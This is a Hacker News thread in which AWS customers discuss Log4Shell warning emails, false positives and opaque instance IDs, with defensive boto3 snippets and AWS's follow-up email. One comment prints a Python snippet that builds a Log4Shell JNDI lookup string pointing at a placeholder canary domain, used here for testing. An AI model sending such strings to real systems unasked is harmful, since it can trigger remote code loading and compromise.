Tell HN: AWS warns us about irregular activity related to Log4shell
143 points by stunt on Dec 18, 2021 | 23 comments
We received a few emails from AWS about irregular activity related to Log4shell. I asked a few friends, and they got similar messages as well.

AWS provided a list of EC2 instances where they saw DNS queries which are typically used when targeting the log4j vulnerability, but they did not provide further information.

Have you received similar notifications? What have you done about suspicious instances?

The ironic part is that AWS did this on a Friday, while half of the internet was busy making memes about the Log4j vulnerability having been disclosed on a Friday.




I think this is what AWS GuardDuty is supposed to do?

Edit: https://aws.amazon.com/blogs/security/using-aws-security-ser...

GuardDuty: In addition to finding the presence of this vulnerability through Inspector, the Amazon GuardDuty team has also begun adding indicators of compromise associated with exploiting the Log4j vulnerability, and will continue to do so. GuardDuty will monitor for attempts to reach known-bad IP addresses or DNS entries, and can also find post-exploit activity through anomaly-based behavioral findings. For example, if an Amazon EC2 instance starts communicating on unusual ports, GuardDuty would detect this activity and create the finding Behavior:EC2/NetworkPortUnusual. This activity is not limited to the NetworkPortUnusual finding, though. GuardDuty has a number of different findings associated with post-exploit activity that might be seen in response to a compromised AWS resource. For a list of GuardDuty findings, please refer to the GuardDuty documentation.
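
If you want to pull those findings yourself rather than click through the console, something roughly like this should work. It's an untested boto3 sketch; the finding type is the one named in the blog post above, and region/credentials are assumed to already be configured:

  # Rough sketch: list GuardDuty findings of the Behavior:EC2/NetworkPortUnusual
  # type mentioned above (assumes GuardDuty is already enabled).
  import boto3

  gd = boto3.client("guardduty")
  for detector_id in gd.list_detectors()["DetectorIds"]:
      ids = gd.list_findings(
          DetectorId=detector_id,
          FindingCriteria={
              "Criterion": {"type": {"Eq": ["Behavior:EC2/NetworkPortUnusual"]}}
          },
      )["FindingIds"]
      for f in gd.get_findings(DetectorId=detector_id, FindingIds=ids)["Findings"]:
          print(f["Id"], f["Type"], f["Severity"])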


We received this as well, except:

1. We don't use Java

2. The instances in the email are not in our accounts

We later received another email providing some vague reasons for this…

On a Friday evening, I was not very happy spending time trying to hunt down the invalid instances.


We received notifications as well, for instances that do not run and have never run Java. These instances don't provide DNS resolution for any other hosts or act as proxies. I'm curious whether there was some data corruption on the AWS side.


We also received that email, but it was also followed up on by one of our TAMs. For some inexplicable reason, the instance IDs in the email are AWS's internal IDs and are not visible to us, so it's actually pretty useless. They followed up and gave us the actual instance ID to investigate, but we think it's a false positive, as there is no Java on that instance.


I had it relating to images in ECR, and similarly spent a while hunting them down. They were in my account, but surely the email could've told me which region, or even linked them directly!


Wow... I'd be curious whether this has happened to anyone else. What were the vague reasons?


We had a non-AWS false positive: when we sent the log4j exploit string with a prepared unique subdomain via email, an anti-spam system did a DNS request on the subdomain. Apparently it looks for any content remotely resembling a URL and probes it. Similar to what was reported about Protonmail here: https://news.ycombinator.com/item?id=29537549
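
For anyone curious, the kind of string we mean looks roughly like the sketch below. It's illustrative only; "log4j-canary.example.com" is a made-up placeholder, you'd use a domain whose DNS you actually control:

  # Sketch: build a log4j test string with a unique subdomain so any DNS
  # query for it can be traced back to the exact message that carried it.
  # "log4j-canary.example.com" is a placeholder; use a domain you control.
  import uuid

  token = uuid.uuid4().hex
  payload = "${jndi:ldap://" + token + ".log4j-canary.example.com/a}"
  print(payload)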


It happened to us too.

There's no JVM (or log4j) in our environment, but we received this notification listing 6 instance IDs as having done DNS lookups to suspect domains.

No trace of those instance IDs in our account over the past few weeks, and after following up with a ticket we were told they're actually the instance IDs that sit underneath some Fargate tasks (no info on which tasks or ECS service, of course, because that would be sensible).

We've rechecked the bits of our stack that run on Fargate and confirmed there's definitely no JVM, so we figure it must be a false positive. Maybe DNS lookups to customer controlled hostnames (which we support as part of a feature, and sandbox carefully).


Here it is below. For us it was #4, which I should clarify was not vague, just my tired memory of it; once I received this I was very relieved and went to sleep. I can tell they are definitely trying and IMO doing the right thing with their efforts. Below is the follow-up email that let us get some sleep.

Earlier today, we provided you a notification with a list of instances that may still be running a version of log4j that has a known security vulnerability and needs to be patched. We want to provide you additional details about that email.

The list of instances was obtained by monitoring for specific DNS queries which are typically used when targeting the log4j vulnerability. These DNS lookups can indicate that someone is attempting to exploit the log4j vulnerability on your instance. Each of the instances provided has made a DNS lookup to one of the suspect domains between 12:00 AM and 11:59 PM PST on December 16th 2021. While we are not able to tell whether the instance was compromised, we strongly recommend that you take action to update log4j across all of your Java environments, whether they are publicly accessible or not.

In some cases, the list of instances included instance IDs that may not currently be present within your EC2 environment. This happened for a number of reasons:

1. EC2 instances may have been terminated since the scan was completed at 11:59 AM PST on December 16th 2021;

2. EC2 instances that have been stopped and restarted may appear with the incorrect instance ID;

3. ECS, EKS, and Fargate containers have been included with the underlying instance ID instead of the container ID;

4. EC2 instances used by underlying network services were erroneously included in the list of instances. These services are not themselves running unpatched log4j, but can be indicative of these DNS queries coming from within your VPC.

While it is not always possible for us to pinpoint the exact instances making these DNS queries, it is critically important that you patch all Java environments for the log4j issue, whether they are publicly accessible or not. To help you, we are also providing a 15-day free trial to Amazon Inspector which can assist you in finding vulnerable resources by scanning your Amazon Elastic Compute Cloud (EC2) instances and container images for the log4j vulnerability.

Please take the steps explained in this security blog post [1] to protect your resources. You also can find more information about log4j in our security bulletin [2].

If you have any questions or concerns, please reach out to AWS Support [3].

[1] https://aws.amazon.com/blogs/security/using-aws-security-ser...
[2] https://aws.amazon.com/security/security-bulletins/AWS-2021-...
[3] https://console.aws.amazon.com/support
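
Side note: once Inspector v2 is enabled, a quick boto3 sketch like this (untested, paging omitted, not an official AWS snippet) should pull the log4j findings it has recorded:

  # Rough sketch: ask Inspector v2 for findings tied to CVE-2021-44228
  # (assumes Inspector2 is already enabled in the account).
  import boto3

  inspector = boto3.client("inspector2")
  resp = inspector.list_findings(
      filterCriteria={
          "vulnerabilityId": [{"comparison": "EQUALS", "value": "CVE-2021-44228"}]
      }
  )
  for finding in resp["findings"]:
      print(finding["awsAccountId"], finding["title"])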


We received this. We have no Java.

The notification from AWS referenced an instance we don’t have.

Some clarification from AWS would be nice. It made me wonder if it was related to an ELB or something.


The one we received stated we were notified because "your account has container images stored in Amazon Elastic Container Registry (ECR)". Currently we do not use ECR, and if anything was using ECR, it was from previous devs who worked on PoCs that never made it to production.

I have no experience with ECR, but because of this I've had to stop what I was doing and spend several hours looking into it, just to CYA that unused but undead/legacy data wasn't leaving us vulnerable. 'Cause that's how we all want to spend weekends.


I replied above, but the instance IDs they sent in the email are their own internal references to your instances, and there appears to be no way of converting those internal IDs into ones that are useful to you. I'd raise a support case if you don't have a TAM to ask.


It seems so stupid to have to correlate the two. AWS really is a hotchpotch mess...


If I got the same (I haven't seen it for my AWS accounts), I would start capturing DNS traffic ASAP, either at the VPC or host level. It's cheap and easy to do most of the time.

If you're not running Java (including agents), it may indicate some other type of compromise, and it's not something you should really ignore. Look at logs, CPU, disk, and port usage just to start.
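
At the VPC level, Route 53 Resolver query logging gets you most of the way. A rough boto3 sketch, not a drop-in script: the log group ARN and VPC ID below are placeholders, and error handling is omitted:

  # Rough sketch: turn on VPC-level DNS query logging via Route 53 Resolver
  # and ship queries to a CloudWatch log group. ARN and VPC ID are placeholders.
  import uuid
  import boto3

  r53r = boto3.client("route53resolver")
  cfg = r53r.create_resolver_query_log_config(
      Name="log4shell-dns-audit",
      DestinationArn="arn:aws:logs:us-east-1:111122223333:log-group:/dns/queries",
      CreatorRequestId=str(uuid.uuid4()),
  )["ResolverQueryLogConfig"]

  r53r.associate_resolver_query_log_config(
      ResolverQueryLogConfigId=cfg["Id"],
      ResourceId="vpc-0123456789abcdef0",
  )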


All of this tells me that, with the number of possible vulns times the number of startups/companies managing their own EC2 times the number of OSes, libraries, and platforms… our current Internet is in an appalling state of security, and keeping up to date will require tethering our OSes to something central that manages security upgrades very fast…


Real prioritization of software security (or quality for that matter) would require a radical rethink of our current software practices. It would be too costly, no one is ready to pay for it, so instead we hobble along with the current clusterfuck. As long as the current approach doesn't lose anyone billions of dollars, it will be deemed good enough (and even if it does, the cost of a secure rewrite of everything would probably be closer to trillions, not billions).


So, communist security? Be damned any that have other dependencies, you will all get the same. The fruits of your labour will be shared amongst all for the security of all.


Just a theory, but it might be from an SSH user where the log4j string somehow ends up in a reverse DNS lookup of the originating IP. Even when the login fails, the lookup will still be done.


I'm under the impression that AWS in general proactively scans/monitors for (some) vulnerabilities on its infrastructure and notifies its customers.

Years ago I once received a warning regarding a potential exposure. I don't think the scanning is very extensive, and in our case it wasn't a big deal, but I considered that notification back then a pretty "high level of service". Yes, such a notification can be scary, but better a little scare than having your systems compromised. This post on HN is reassuring that AWS tries to keep it that way. (We didn't get the Log4Shell warning, as we're not vulnerable afaict.)


Maybe it's just advertising, using this period to point at products like GuardDuty. These are golden times for most vendors and suppliers of anything security related.


Being a new and highly visible target, maybe AWS sent out false-positive emails when it saw an attempt on your VM? Or maybe one of AWS's DNS servers was listed by AWS as being used by hackers, and your own VM happened to use AWS DNS resolution?

Just some thoughts. It sucks to lose time, but the notices probably helped more than they hurt? False positives are part of the price of modern defense...

If I get a suspicious instance, I usually snapshot the disk and blow the instance away. We don't have a lot of resources for investigation, but we'd probably look at what we can get from logs, check the scope of the damage, and likely move on... We only run instances when we have no other choice, so they generally just receive pushed data, with no real pull access.


Yeah, we got one saying our ECR images MAY be vulnerable. But everything else in the email made it sound quite urgent.


I noticed that Docker Hub is now showing whether images have Log4j vulnerabilities: https://hub.docker.com/_/ubuntu?tab=tags

  latest | Log4Shell CVE not detected



